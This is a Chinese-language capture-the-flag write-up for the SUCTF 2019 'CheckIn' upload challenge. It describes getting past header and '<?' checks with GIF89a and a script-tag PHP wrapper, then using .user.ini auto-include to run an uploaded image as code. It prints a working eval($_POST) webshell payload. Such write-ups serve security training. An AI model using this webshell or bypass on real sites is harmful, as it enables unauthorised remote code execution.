[SUCTF 2019]CheckIn
文章目录
- [SUCTF 2019]CheckIn
- 掌握知识
- 解题思路
- 关键paylaod
掌握知识
.user.ini
文件上传利用–需要上传目录有一个php
文件(index.php),文件头绕过,文件内容<?
检测
解题思路
- 打开题目链接,发现又是一个上传文件题目,继续上传改后缀的一句话木马,然后抓包,修改php后缀发现返回非法后缀名,尝试
phtml.php3.php6...
都没成功,看来是白名单了。
- 只好尝试上传一下
jpg
文件查看一下其他过滤和上传目录,发现还存在文件头检测和对文件内容<?
的检测。文件头添加GIF89a?
即可绕过,<?
的检测可以继续使用js
代码执行php
代码的方式
- 上传正常格式的jpg文件后,发现回显了上传目录和目录结构发现了
index.php
文件。那看来是使用.user.ini
文件了,该文件能够实现文件包含内容,前提就是上传的目录下有一个php
文件,这样使用.user.ini
包含的文件就可以执行文件内的php
代码了
- 利用方法已经明白,接着就上传
.user.ini
和shell.jpg
文件即可,绕过文件头和文件内容即可成功上传
- 现在目录下存在
.user,ini
配置文件,index.php
的php
文件,和含有恶意代码的jpg
文件,只需要访问该php
文件即可自动包含jpg
文件执行其中的恶意代码,所以蚁剑连接的地址也是该php文件。直接蚁剑连接,在根目录下拿下flag
关键paylaod
<script language="php">eval($_POST['a']);</script>
GIF89a?